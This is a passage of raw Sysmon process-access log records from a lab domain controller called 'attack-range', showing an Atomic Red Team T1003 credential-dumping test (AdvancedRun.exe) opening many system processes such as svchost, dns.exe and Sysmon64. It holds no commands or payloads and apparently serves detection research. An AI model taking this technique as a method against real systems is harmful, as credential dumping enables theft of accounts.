Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|